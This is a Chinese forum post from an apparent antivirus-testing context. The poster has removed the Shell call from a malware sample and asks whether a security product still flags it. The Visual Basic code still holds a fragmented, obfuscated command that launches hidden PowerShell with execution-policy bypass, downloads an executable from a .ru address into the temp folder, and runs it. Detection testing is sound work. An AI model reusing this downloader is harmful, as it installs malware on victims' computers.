最开始的样本
我把Shell函数给删了,也就是说没有任何恶意行为,你看看智量报不报
现在的代码- Private Sub Form_Load()
- Dim ABT6rB, t78grT, GB7bf79, GB8htUY, OGgT3T9i, e57Vv8O, aiuGBU, oB8rv6, A6V68tf, adhn8u, asdinc8d, dun83qnrw, sadxby7, wdyxb7, as76rvew, qxyee4, afsruf, rn49q8xrn, mmmmm As String
- ABT6rB = "cmd.e"
- t78grT = "xe /c iwbDyExnfh"
- GB7bf79 = "FHuWV & Po^"
- GB8htUY = "wEr^sh^ell.e"
- OGgT3T9i = "^Xe -execut"
- e57Vv8O = "ionpolicy byp"
- aiuGBU = "ass -nopro"
- oB8rv6 = "file -w hidd"
- A6V68tf = "en $v1='Net.W'; $v2='ebCli"
- adhn8u = "ent'; $var = (New-O"
- asdinc8d = "bject $v1$v2); $var.Hea"
- dun83qnrw = "ders['User-Agent'] = 'Googl"
- sadxby7 = "e Chrome'; $var.downloadfile('ht"
- wdyxb7 = "tp://scprodu"
- as76rvew = "cts7.ru/ava"
- qxyee4 = "ilableupdatemanager/pop"
- afsruf = "py.exe','%te"
- rn49q8xrn = "mp%WHk58.ex"
- mmmmm = "e'); & %temp%WHk58.exe & CXorbhFlHAGsKcP"
- End
- End Sub
复制代码
|